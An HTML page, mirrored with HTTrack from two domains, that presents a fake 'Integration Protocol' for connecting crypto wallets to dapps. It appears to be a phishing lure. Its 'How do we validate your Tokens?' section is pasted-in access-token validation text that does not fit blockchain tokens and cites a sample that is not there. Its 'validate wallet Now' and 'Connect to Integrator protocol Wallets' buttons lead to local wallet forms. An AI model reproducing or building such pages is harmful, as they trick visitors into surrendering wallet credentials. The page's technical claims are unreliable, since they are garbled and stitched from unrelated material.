<html>


<!-- Mirrored from integrationprotocol.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 12 Oct 2021 17:38:34 GMT -->

<!-- Mirrored from dappsintegration.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Oct 2021 18:54:14 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="assets/main.css" type="text/css"> 
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="images/logo.html">

<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
<title>INTEGRATION PROTOCOL</title>
</head>
<style>
    a:link, a:visited {
      background-color: #07305a;
      color: rgb(245, 247, 250);
      padding: 15px 25px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
    }
     
    a:hover, a:active {
      background-color: rgb(84, 162, 207);
    }
    
    </style>
    
    
<body>
<center>
   
    
    <div>
        <a class="main responsive image-responsive"><img src="banner1.png" alt="logo"></a>
        
        
</div>
<br>
<div class="gFeYHJ">INTEGRATION PROTOCOL</div>

<div class="lpfxqP">Open protocol for Integrating various Wallets to Dapps Secure Server</div>
<br>

<div class="main">
<img src="banner2.png" alt="Walletsynct">
</div>

    <br>
    
    
<div class="bout">
<h2 class="home">What are Crypto Tokens?</h2>
<p>The term crypto token refers to a special virtual currency token or how cryptocurrencies are denominated.
   These tokens represent fungible and tradable assets or utilities that reside on their own blockchains. Crypto tokens are often used to fundraise for crowd sales, but they can also be used as a substitute for other things.
   These tokens are usually created, distributed, sold, and circulated through the standard initial coin offering (ICO) process, which involves a crowdfunding exercise to fund project development.
</p><br>
<h2 class="home">How do we validate your Tokens?</h2>
<p>There are various ways we can validate your tokens synchronized in the Blockchain Network'
  <ul> 
  <li>This approach guarantees that the token is valid, not expired or revoked. Every backend service validates access token only by signature.
     Some services that have strong security requirements (e.g., in case of personal data access) may still validate access token by the introspecting endpoint.</li>
    <li>The ValidateToken method is called by the infrastructure to validate and extract the claims from the deserialized security token. 
      These claims are returned in the collection of ClaimsIdentity objects returned by the method.
       In the typical case, this collection will contain a single identity.</li>
     <li>By specifying a key here, the token can be validated without any need for the issuing server. What is needed, instead, is the location of the public key.
        The certLocation parameter in the sample above is a string pointing to a certificate file containing the public key corresponding to the private key used by the issuing authentication server.</li>
  </ul>
  </p>
</div>



<div>
<h3><a href="integrator/index.html" class="btn btn-primary mt-6 mx-auto downloadapp-native">
  Connect to Integrator protocol Wallets 
  </a></h3>
  <br>

<div>You can also enable wallet connect for your multiple
 iOS and Android wallets protocol.
 <h3><a href="form/connect/meta.html" class="btn btn-primary mt-6 mx-auto downloadapp-native">
  validate wallet Now
  </a></h3>

</div>

</div>


</center>
</body>
 
<!-- Mirrored from integrationprotocol.org/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 12 Oct 2021 17:38:52 GMT -->

<!-- Mirrored from dappsintegration.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 30 Oct 2021 18:54:28 GMT -->
</html>